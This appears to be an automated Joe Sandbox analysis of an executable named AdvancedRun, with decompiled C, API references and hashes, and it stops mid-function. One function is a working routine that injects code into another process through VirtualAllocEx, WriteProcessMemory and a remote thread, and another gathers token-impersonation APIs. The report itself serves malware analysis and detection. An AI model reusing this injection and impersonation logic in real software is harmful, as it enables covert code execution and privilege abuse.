                                                                  • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208librarymemoryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 70%
                                                                  			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

































                                                                  0x0040a474
                                                                  0x0040a47b
                                                                  0x0040a48a
                                                                  0x0040a48d
                                                                  0x0040a48f
                                                                  0x0040a497
                                                                  0x0040a49a
                                                                  0x0040a6f7
                                                                  0x0040a6f9
                                                                  0x0040a700
                                                                  0x0040a700
                                                                  0x0040a4ad
                                                                  0x0040a4b3
                                                                  0x0040a4b8
                                                                  0x0040a4c6
                                                                  0x0040a4cc
                                                                  0x0040a4cf
                                                                  0x0040a4dd
                                                                  0x0040a4e2
                                                                  0x0040a4e3
                                                                  0x0040a4ea
                                                                  0x0040a4e5
                                                                  0x0040a4e5
                                                                  0x0040a4e5
                                                                  0x0040a4ec
                                                                  0x0040a4f6
                                                                  0x0040a4fe
                                                                  0x0040a503
                                                                  0x0040a504
                                                                  0x0040a50b
                                                                  0x0040a506
                                                                  0x0040a506
                                                                  0x0040a506
                                                                  0x0040a50d
                                                                  0x0040a512
                                                                  0x0040a518
                                                                  0x0040a51c
                                                                  0x0040a523
                                                                  0x0040a523
                                                                  0x0040a523
                                                                  0x0040a528
                                                                  0x0040a537
                                                                  0x0040a54c
                                                                  0x0040a539
                                                                  0x0040a544
                                                                  0x0040a549
                                                                  0x0040a558
                                                                  0x0040a56d
                                                                  0x0040a55a
                                                                  0x0040a565
                                                                  0x0040a56a
                                                                  0x0040a579
                                                                  0x0040a591
                                                                  0x0040a57b
                                                                  0x0040a589
                                                                  0x0040a58e
                                                                  0x0040a5b4
                                                                  0x0040a5b7
                                                                  0x0040a5cc
                                                                  0x0040a5cf
                                                                  0x0040a5d4
                                                                  0x0040a5d7
                                                                  0x0040a6ed
                                                                  0x0040a5e5
                                                                  0x0040a5fa
                                                                  0x0040a60b
                                                                  0x0040a61a
                                                                  0x0040a620
                                                                  0x0040a623
                                                                  0x0040a62b
                                                                  0x0040a62f
                                                                  0x0040a632
                                                                  0x0040a659
                                                                  0x0040a634
                                                                  0x0040a635
                                                                  0x0040a641
                                                                  0x0040a648
                                                                  0x0040a648
                                                                  0x0040a668
                                                                  0x0040a66e
                                                                  0x0040a685
                                                                  0x0040a69e
                                                                  0x0040a6a8
                                                                  0x0040a6ad
                                                                  0x0040a6bd
                                                                  0x0040a6c5
                                                                  0x0040a6c8
                                                                  0x0040a6d0
                                                                  0x0040a6d1
                                                                  0x0040a6d2
                                                                  0x0040a6d3
                                                                  0x0040a6d3
                                                                  0x0040a6c8
                                                                  0x0040a6d7
                                                                  0x0040a6dc
                                                                  0x0040a6dc
                                                                  0x0040a6d7
                                                                  0x00000000

                                                                  APIs
                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                  • memset.MSVCRT ref: 0040A4B3
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                    • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                    • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                    • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                    • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                    • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                    • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                  • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                  • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                  • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                  • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                  • memset.MSVCRT ref: 0040A66E
                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                  • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                  • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                  • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                  • GetLastError.KERNEL32 ref: 0040A6E4
                                                                  • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                  • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                  • API String ID: 1572607441-20550370
                                                                  • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                  • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                  • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                  • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}






                                                                  0x004028a3
                                                                  0x004028ab
                                                                  0x004028bd
                                                                  0x004028ca
                                                                  0x004028d7
                                                                  0x004028e3
                                                                  0x004028e6
                                                                  0x004028e8
                                                                  0x00000000
                                                                  0x004028eb
                                                                  0x004028ec

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                  • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                  • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                  • API String ID: 2238633743-1970996977
                                                                  • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                  • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                  • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                  • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70threadinjectionCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 64%
                                                                  			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}




















                                                                  0x0040a27d
                                                                  0x0040a286
                                                                  0x0040a290
                                                                  0x0040a29d
                                                                  0x00000000
                                                                  0x0040a32f
                                                                  0x0040a29f
                                                                  0x0040a2a4
                                                                  0x0040a2ad
                                                                  0x0040a2b6
                                                                  0x0040a2bc
                                                                  0x0040a2be
                                                                  0x0040a2c4
                                                                  0x0040a2c8
                                                                  0x0040a2ce
                                                                  0x0040a2e3
                                                                  0x0040a2ed
                                                                  0x0040a2fb
                                                                  0x0040a2fe
                                                                  0x0040a305
                                                                  0x0040a30c
                                                                  0x0040a30f
                                                                  0x0040a313
                                                                  0x00000000
                                                                  0x0040a31a
                                                                  0x0040a338

                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?,76D268A0,00000000), ref: 0040A290
                                                                  • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                    • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                    • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                  • String ID: $
                                                                  • API String ID: 283512611-3993045852
                                                                  • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                  • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                  • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                  • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 85%
                                                                  			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                  0x00401093
                                                                  0x00401096
                                                                  0x00401097
                                                                  0x0040109b
                                                                  0x004010a3
                                                                  0x004010a5
                                                                  0x00401270
                                                                  0x00401278
                                                                  0x004012b3
                                                                  0x0040127a
                                                                  0x00401293
                                                                  0x004012a2
                                                                  0x004012a2
                                                                  0x004012c1
                                                                  0x004012d9
                                                                  0x004012ea
                                                                  0x004012ec
                                                                  0x004012f6
                                                                  0x00000000
                                                                  0x004010ab
                                                                  0x004010ab
                                                                  0x004010ac
                                                                  0x00401231
                                                                  0x00401236
                                                                  0x00401239
                                                                  0x0040123d
                                                                  0x00401249
                                                                  0x00401249
                                                                  0x0040124c
                                                                  0x00000000
                                                                  0x00401252
                                                                  0x00401259
                                                                  0x00401265
                                                                  0x00000000
                                                                  0x00401265
                                                                  0x0040123f
                                                                  0x0040123f
                                                                  0x00401243
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00401243
                                                                  0x004010b2
                                                                  0x004010b2
                                                                  0x004010b5
                                                                  0x004011e1
                                                                  0x004011e3
                                                                  0x004011e6
                                                                  0x0040120e
                                                                  0x00401216
                                                                  0x00000000
                                                                  0x0040121c
                                                                  0x00401224
                                                                  0x00401226
                                                                  0x00401229
                                                                  0x00000000
                                                                  0x0040122f
                                                                  0x00000000
                                                                  0x0040122f
                                                                  0x00401229
                                                                  0x004011e8
                                                                  0x004011e8
                                                                  0x004011ed
                                                                  0x004011fb
                                                                  0x00401203
                                                                  0x00401203
                                                                  0x004010bb
                                                                  0x004010bb
                                                                  0x004010c0
                                                                  0x00401151
                                                                  0x0040115a
                                                                  0x00401168
                                                                  0x0040116b
                                                                  0x0040116e
                                                                  0x00401170
                                                                  0x00401173
                                                                  0x00401180
                                                                  0x00401182
                                                                  0x00401185
                                                                  0x004011a4
                                                                  0x004011ac
                                                                  0x00000000
                                                                  0x004011b2
                                                                  0x004011ba
                                                                  0x004011bc
                                                                  0x004011c7
                                                                  0x004011c9
                                                                  0x004011cb
                                                                  0x00000000
                                                                  0x004011d1
                                                                  0x00000000
                                                                  0x004011d1
                                                                  0x004011cb
                                                                  0x00401187
                                                                  0x00401187
                                                                  0x00401199
                                                                  0x00000000
                                                                  0x00401199
                                                                  0x004010c6
                                                                  0x004010c8
                                                                  0x004012fd
                                                                  0x004012fd
                                                                  0x004012fd
                                                                  0x004010ce
                                                                  0x004010ce
                                                                  0x004010d7
                                                                  0x004010e5
                                                                  0x004010e8
                                                                  0x004010eb
                                                                  0x004010ed
                                                                  0x004010f0
                                                                  0x00401102
                                                                  0x0040111d
                                                                  0x00401125
                                                                  0x00000000
                                                                  0x0040112b
                                                                  0x00401133
                                                                  0x00401135
                                                                  0x00401140
                                                                  0x00401142
                                                                  0x00401144
                                                                  0x00000000
                                                                  0x0040114a
                                                                  0x0040114a
                                                                  0x00000000
                                                                  0x0040114a
                                                                  0x00401144
                                                                  0x00401104
                                                                  0x0040110a
                                                                  0x0040110b
                                                                  0x0040110b
                                                                  0x0040110e
                                                                  0x00401115
                                                                  0x00401117
                                                                  0x00401117
                                                                  0x00401102
                                                                  0x004010c8
                                                                  0x004010c0
                                                                  0x004010b5
                                                                  0x004010ac
                                                                  0x00401303

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                  • String ID: AdvancedRun
                                                                  • API String ID: 829165378-481304740
                                                                  • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                  • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                  • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                  • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 45%
                                                                  			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
